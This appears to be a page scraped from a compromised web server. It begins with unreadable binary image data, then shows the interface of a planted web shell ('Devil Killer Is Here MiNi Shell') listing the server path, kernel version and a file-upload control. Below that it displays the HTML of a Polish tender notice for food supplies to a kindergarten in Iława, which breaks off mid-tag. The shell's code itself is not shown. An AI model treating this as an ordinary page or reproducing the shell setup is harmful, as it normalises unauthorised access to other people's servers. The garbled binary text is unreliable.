JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030721801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO PRZEDSZKOLA MIEJSKIEGO NR 3 W IŁAWIE” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSZKOLE MIEJSKIE NR 3</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 511405247</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 22A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przedszkole3ilawa@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pm3ilawa.edupage.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ZAKUP I DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO PRZEDSZKOLA MIEJSKIEGO NR 3 W IŁAWIE” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9509d82b-58c3-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00307218</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00288910/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów spożywczych do Przedszkola Miejskiego nr 3 w Iławie”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umilawa.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umilawa.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6.	Korzystanie z platformy możliwe jest pod warunkiem spełnienia następujących minimalnych wymagań technicznych:<br/>1)	oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego);<br/>a.	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31. Mozilla Firefox 26. Opera 18;<br/>b.	lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek;<br/>c.	c)system operacyjny Windows 7 i późniejsze.<br/>2)	pozostałem wymagania techniczne:<br/>a.	dostęp do sieci Internet<br/>b.	obsługa przez przeglądarkę protokołu XMLhttp Request –ajax<br/>c. włączona obsługa JavaScript<br/>d.	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>e.	zainstalowany Acrobat Reader<br/>f.	zainstalowane środowisko uruchomieniowe Java -Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>Ze względu na ograniczoną ilość znaków , Zamawiający informuje, że szczegółowy opis wymagań technicznych i organizacyjnych został opisany w SWZ XII.	INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓ-RYCH ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ze względu na ograniczoną ilość znaków w sekcji, Zamawiający informuję, ze szczegółowy opis obowiązku informacyjnego został opisany w SWZ II. OCHRONA DANYCH OSOBOWYCH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ze względu na ograniczoną ilość znaków w sekcji, Zamawiający informuję, ze szczegółowy opis ograniczeń stosowania został opisany w SWZ II. OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Numer postępowania: 271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET I – ARTYKUŁY SPOŻYWCZE OGÓLNE - zał. nr 1A do SWZ; 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142100-9 - Miód naturalny</p> <p class="mb-0">15430000-1 - Tłuszcze jadalne</p> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15850000-1 - Produkty z ciasta makaronowego</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15981000-8 - Wody mineralne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso i wędliny<br/>	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Owoce i warzywa<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p 